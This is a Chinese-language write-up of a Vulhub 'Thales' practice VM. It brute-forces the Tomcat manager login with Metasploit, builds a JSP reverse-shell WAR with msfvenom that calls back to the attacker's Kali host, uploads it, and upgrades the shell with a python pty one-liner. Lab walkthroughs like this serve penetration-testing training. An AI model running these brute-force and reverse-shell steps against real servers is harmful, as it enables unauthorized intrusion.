vulhub-Thales靶机练习

1.安装靶机

可以看到没有IP地址,所以我们得通过kali扫出我们的IP地址

2.IP扫描

可以根据我们的MAC地址来判断除我们的靶机IP,同时我们可以看到开放了22和8080端口

3.端口访问

首先我们访问一下8080端口

点击host manager,给我们弹出一个登录界面

4.漏洞查找

这时我们可以利用msf来爆破一下,首先我们先启动一下msf

复制代码
msfconsole

然后我们查找一下tomcat可以利用的东西

复制代码
search tomcat login

接下来我们利用这个来进行爆破,这里已经给了我们怎么使用的语句

复制代码
use 0

输入我们要爆破的IP地址

复制代码
set rhosts 172.16.2.5
run

成功获得我们的账号密码

然后去登录一下,登录到我们的管理员系统

在应用程序列表的位置我们找到了上传文件的地方,这里我们可以上传一个反弹shell的文件

利用kali生成一个反弹shell的war文件

复制代码
msfvenom  -p java/jsp_shell_reverse_tcp LHOST=172.16.2.61 LPORT=8888 -f war -o shell.war //kali的地址以及端口

上传我们的shell文件并开启监听

可以看到反弹shell成功,可以升级一下变成可交互的页面

复制代码
python3 -c "import pty;pty.spawn('/bin/bash')"
相关推荐
黎阳之光8 小时前
黎阳之光:视频孪生领跑者,铸就中国数字科技全球竞争力
大数据·人工智能·算法·安全·数字孪生
上海云盾-高防顾问8 小时前
网络安全防护发展趋势:从被动防御到主动赋能
安全·web安全
CCTI_Curran8 小时前
UL4200A是美国针对纽扣电池安全标准
安全·纽扣电池·ul4200a·纽扣电池gcc认证·美国亚马逊
做个文艺程序员8 小时前
MySQL安全加固十大硬核操作
数据库·mysql·安全
是罐装可乐8 小时前
深入理解“句柄(Handle)“:从浏览器安全到文件系统访问
前端·javascript·安全
Figo_Cheung9 小时前
Figo义商本体约束推理引擎 (CRE):基于已部署CRE本地模型的技术实践研究——迈向AGI时代的AI伦理安全框架
人工智能·安全
信创DevOps先锋10 小时前
DevOps工具链选型新趋势:本土化适配与安全可控成企业核心诉求
运维·安全·devops
ayt00710 小时前
Netty AbstractNioChannel源码深度剖析:NIO Channel的抽象实现
java·数据库·网络协议·安全·nio
盟接之桥12 小时前
盟接之桥®制造业EDI软件,打通全球供应链“最后一公里”,赋能中国制造连接世界
网络·安全·低代码·重构·汽车·制造
ZKNOW甄知科技12 小时前
数智同行:甄知科技2026年Q1季度回顾
运维·服务器·人工智能·科技·程序人生·安全·自动化